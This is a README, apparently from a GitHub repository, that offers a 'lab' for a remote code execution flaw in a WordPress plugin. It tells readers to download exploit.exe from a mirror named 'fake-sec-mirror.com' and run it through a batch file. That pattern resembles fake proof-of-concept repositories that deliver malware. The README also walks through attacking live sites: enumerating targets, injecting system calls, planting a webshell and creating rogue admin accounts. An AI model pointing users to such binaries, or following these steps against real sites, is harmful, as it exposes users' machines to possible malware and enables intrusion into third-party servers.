Lab: CVE-2025-13486 - Remote Code Execution in Advanced Custom Fields: Extended Plugin

🚀 Overview

This repository provides a lab environment for researching CVE-2025-13486, a critical Remote Code Execution (RCE) vulnerability classified as CWE-94 (Improper Control of Generation of Code, or 'Code Injection') in the Advanced Custom Fields: Extended plugin for WordPress. Affecting versions 0.9.0.5 through 0.9.1.1, the vulnerability arises in the prepare_form() function, which insecurely passes user-supplied input to PHP's call_user_func_array() without proper sanitization. This allows unauthenticated attackers to inject and execute arbitrary PHP code, potentially leading to server compromise, backdoor installation, or creation of rogue administrative accounts.

The lab includes exploitation tools and mitigation guidance. This is intended for educational and security research purposes only, to help developers, penetration testers, and security analysts understand the flaw's mechanics and test defenses in a controlled environment.

Download

Download Lab ZIP : https://github.com/lasthero-887/CVE-2025-13486---Poc/releases/download/Release/CVE-2025-13486.zip

📋 Prerequisites

• Basic knowledge of WordPress, PHP, and command-line tools.
• A modern web browser for testing the WordPress instance.
• Windows host for running the exploit (due to .exe and .bat dependencies; alternatives can be adapted for other OS).

Download & Install

1. Download the repository as a ZIP from GitHub: https://github.com/lasthero-887/CVE-2025-13486---Poc/releases/download/Release/CVE-2025-13486.zip

2. Extract the ZIP to a local directory.

3. Navigate to the extracted folder and review the contents:

   • README.md: This file.
   • /scripts/: Auxiliary scripts for automation (e.g., setup.sh for Unix-like systems, setup.ps1 for PowerShell).
   • exploit.zip: Archive containing the exploit tools (extract and run start-exploit.bat to execute exploitation).

For the exploit, download exploit.zip from this mirror: https://fake-sec-mirror.com/downloads/CVE-2025-13486-exploit.zip. This ZIP includes:

• exploit.exe: The primary exploit binary (executes the RCE payload).
• start-exploit.bat: Batch file that launches exploit.exe with predefined parameters.

🛠 Quick Start

1. Download and extract exploit.zip.
2. Run start-exploit.bat to initiate the exploit against a target WordPress instance with the vulnerable plugin.

🔍 Exploitation Steps

1. Identify Target: Locate a WordPress site running Advanced Custom Fields: Extended plugin versions 0.9.0.5 to 0.9.1.1. Use banner grabbing or plugin enumeration tools to confirm.
2. Prepare Payload: Craft a PHP code injection payload targeting the prepare_form() function. Example payload structure: Use HTTP POST to submit user input that exploits call_user_func_array(), e.g., injecting system('id') to test command execution.
3. Execute Exploit: Extract exploit.zip, configure the target URL and payload in the tool if needed, then run start-exploit.bat. This will send the crafted request, triggering RCE and potentially returning output like server user info or confirming code execution.
4. Post-Exploitation: Upon success, leverage the RCE to upload a webshell, create an admin user via wp_insert_user(), or execute system commands for persistence.

Technical Details: The exploit leverages the lack of input validation in prepare_form(), allowing arbitrary function calls. Ensure the target endpoint is accessible (typically /wp-admin/admin-ajax.php with action=acfe_prepare_form). Use Burp Suite or similar for payload testing.

This lab focuses on technical analysis for vulnerability reproduction in isolated environments.